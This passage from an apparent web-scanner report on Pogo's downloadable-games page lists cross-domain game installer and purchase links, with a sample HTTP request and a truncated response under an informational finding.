https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11540487&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115451480&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=116552770&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=116553257&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=116708453&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=116962930&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117081913&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117135580&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117398213&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11741447&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117415740&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117842230&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118451110&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118577433&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119110640&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119361140&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119473437&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119717670&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=

Request

GET /AllGames.aspx?SortBy=gameName&sDir=DESC HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 61957
Cache-Control: private, max-age=9847
Date: Sun, 09 Jan 2011 02:09:14 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<meta name="description" content="Try all downloadable games at Pogo for free including Picktureka! Museum Mayhem,
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" target="_self" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 7:52:28 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Zuma_Deluxe-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=Zuma_Deluxe-setup.exe" target="_self" onclick="omnitureLogDownload('11011713','oberonpogostd','Zuma','puzzle','1/8/2011 7:52:28 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11011713&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/ZoomBook-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=ZoomBook-setup.exe" target="_self" onclick="omnitureLogDownload('113378403','oberonpogostd','ZoomBook','puzzle','1/8/2011 7:52:28 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=113378403&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/ZOODomino-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=ZOODomino-setup.exe" target="_self" onclick="omnitureLogDownload('114994837','oberonpogostd','ZOODomino','arcade','1/8/2011 7:52:28 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=114994837&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zombie_bowl-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=zombie_bowl-setup.exe" target="_self" onclick="omnitureLogDownload('117842230','oberonpogostd','Zombie Bowl O Rama','arcade','1/8/2011 7:52:28 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117842230&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zenerchi-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=zenerchi-setup.exe" target="_self" onclick="omnitureLogDownload('115451480','oberonpogostd','Zenerchi','puzzle','1/8/2011 7:52:28 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115451480&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Yummy_Drink_Factory-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=Yummy_Drink_Factory-setup.exe" target="_self" onclick="omnitureLogDownload('115303260','oberonpogostd','Yummy Drink Factory','arcade','1/8/2011 7:52:28 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115303260&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/YoudaCamper-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=YoudaCamper-setup.exe" target="_self" onclick="omnitureLogDownload('114757800','oberonpogostd','YoudaCamper','arcade','1/8/2011 7:52:28 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=114757800&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_sushi_chef-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=youda_sushi_chef-setup.exe" target="_self" onclick="omnitureLogDownload('117415740','oberonpogostd','Youda Sushi Chef','arcade','1/8/2011 7:52:28 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117415740&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_survivor_56465420-setup.exe?RefId=&origin=ponline_dl_img&genre=Time Management&ln=en&ext=youda_survivor_56465420-setup.exe" target="_self" onclick="omnitureLogDownload('119473437','oberonpogostd','Youda Survivor','Time Management','1/8/2011 7:52:28 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119473437&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_marina-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=youda_marina-setup.exe" target="_self" onclick="omnitureLogDownload('117135580','oberonpogostd','Youda Marina','arcade','1/8/2011 7:52:29 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117135580&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_legend_curse_amsterdam-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=youda_legend_curse_amsterdam-setup.exe" target="_self" onclick="omnitureLogDownload('11741447','oberonpogostd','Youda Legend Curse of Amsterda','Hidden Object','1/8/2011 7:52:29 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11741447&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Youda_legend_golden_bird_13258465-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=Youda_legend_golden_bird_13258465-setup.exe" target="_self" onclick="omnitureLogDownload('118451110','oberonpogostd','Youda Legend Golden Bird','Hidden Object','1/8/2011 7:52:29 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118451110&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_farmer-setup.exe?RefId=&origin=ponline_dl_img&genre=Strategy&ln=en&ext=youda_farmer-setup.exe" target="_self" onclick="omnitureLogDownload('116553257','oberonpogostd','Youda Farmer','Strategy','1/8/2011 7:52:29 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=116553257&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/youda_fairy_89511235-setup.exe?RefId=&origin=ponline_dl_img&genre=Time Management&ln=en&ext=youda_fairy_89511235-setup.exe" target="_self" onclick="omnitureLogDownload('118577433','oberonpogostd','Youda Fairy','Time Management','1/8/2011 7:52:29 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118577433&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/yosumin-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=yosumin-setup.exe" target="_self" onclick="omnitureLogDownload('116962930','oberonpogostd','Yosumin','puzzle','1/8/2011 7:52:29 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=116962930&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/yard_sale_junkie-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=yard_sale_junkie-setup.exe" target="_self" onclick="omnitureLogDownload('117081913','oberonpogostd','Yard Sale Junkie','Hidden Object','1/8/2011 7:52:29 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117081913&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zmas_blox_75410444-setup.exe?RefId=&origin=ponline_dl_img&genre=New&ln=en&ext=zmas_blox_75410444-setup.exe" target="_self" onclick="omnitureLogDownload('119717670','oberonpogostd','Xmas Blox','newGames','1/8/2011 7:52:29 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119717670&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_voyage-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=world_voyage-setup.exe" target="_self" onclick="omnitureLogDownload('116552770','oberonpogostd','World Voyage','arcade','1/8/2011 7:52:29 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=116552770&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_riddles_seven_wonders_56231800-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=world_riddles_seven_wonders_56231800-setup.exe" target="_self" onclick="omnitureLogDownload('119361140','oberonpogostd','World Riddles Seven Wonders','puzzle','1/8/2011 7:52:30 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119361140&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_of_goo-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=world_of_goo-setup.exe" target="_self" onclick="omnitureLogDownload('116708453','oberonpogostd','World of Goo','puzzle','1/8/2011 7:52:30 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=116708453&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_mosaics_3_fairy_tales_09535211-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=world_mosaics_3_fairy_tales_09535211-setup.exe" target="_self" onclick="omnitureLogDownload('119110640','oberonpogostd','World Mosaics 3 Fairy Tales','puzzle','1/8/2011 7:52:30 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119110640&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_mosaics_2-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=world_mosaics_2-setup.exe" target="_self" onclick="omnitureLogDownload('117398213','oberonpogostd','World Mosaics 2','puzzle','1/8/2011 7:52:30 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117398213&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/world_mosaics-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=world_mosaics-setup.exe" target="_self" onclick="omnitureLogDownload('11540487','oberonpogostd','World Mosaics','puzzle','1/8/2011 7:52:30 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11540487&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/World_Class_Solitaire-setup.exe?RefId=&origin=ponline_dl_img&genre=Pogo Originals&ln=en&ext=World_Class_Solitaire-setup.exe" target="_self" onclick="omnitureLogDownload('111327327','oberonpogostd','World Class Solitaire To Go','Pogo Original','1/8/2011 7:52:30 PM')" ><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="Try Free" width="15" height="15" border="0">
...[SNIP]...
<td width="32" align="center"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=111327327&channel=110184400&RefID=&orign=pgame_buy_u&ln=en&BillingCountry=US&lc=en&gameCodeDate=" ><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="Buy" width="15" height="15" border="0">
...[SNIP]...

16.18. http://download-games.pogo.com/AllGames.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/AllGames.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://download-games.pogo.com/AllGames.aspx?SortBy=gameName&sDir=ASC&Page=1

The response contains the following links to other domains:

http://gamecenter.cdn3.oberon-media.com/pogo/exe/Age_of_Emerald-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=Age_of_Emerald-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Airport_Mania_First_Flight-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=Airport_Mania_First_Flight-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Alice_Greenfingers-setup.exe?RefId=&origin=ponline_dl_img&genre=Time Management&ln=en&ext=Alice_Greenfingers-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Alien_Shooter-setup.exe?RefId=&origin=ponline_dl_img&genre=Strategy&ln=en&ext=Alien_Shooter-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Amazing_Adventures_The_Lost_Tomb-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=Amazing_Adventures_The_Lost_Tomb-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Amazonia-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=Amazonia-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/agatha_christie_3-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=agatha_christie_3-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/age_of_japan_2_06521214-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=age_of_japan_2_06521214-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/age_of_oracles-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=age_of_oracles-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/alabama_smith_2-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=alabama_smith_2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/alabama_smith_escape_from_pompeii-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=alabama_smith_escape_from_pompeii-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/alchemists_apprentice-setup.exe?RefId=&origin=ponline_dl_img&genre=Puzzle&ln=en&ext=alchemists_apprentice-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/alexandra_fortune-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=alexandra_fortune-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/alice_greenfingers_2-setup.exe?RefId=&origin=ponline_dl_img&genre=Time Management&ln=en&ext=alice_greenfingers_2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/alice_greenfingers_bundle_89125541-setup.exe?RefId=&origin=ponline_dl_img&genre=Bundles&ln=en&ext=alice_greenfingers_bundle_89125541-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/alice_in_wonderland_90834737-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=alice_in_wonderland_90834737-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/alices_magical_mahjong-setup.exe?RefId=&origin=ponline_dl_img&genre=Cards&ln=en&ext=alices_magical_mahjong-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/alices_tea_cup_madness_69514478-setup.exe?RefId=&origin=ponline_dl_img&genre=Time Management&ln=en&ext=alices_tea_cup_madness_69514478-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/alt_shift-setup.exe?RefId=&origin=ponline_dl_img&genre=Arcade&ln=en&ext=alt_shift-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_adventured_bundle-setup.exe?RefId=&origin=ponline_dl_img&genre=Bundles&ln=en&ext=amazing_adventured_bundle-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/amazing_adventures_3-setup.exe?RefId=&origin=ponline_dl_img&genre=Hidden Object&ln=en&ext=amazing_adventures_3-setup.exe
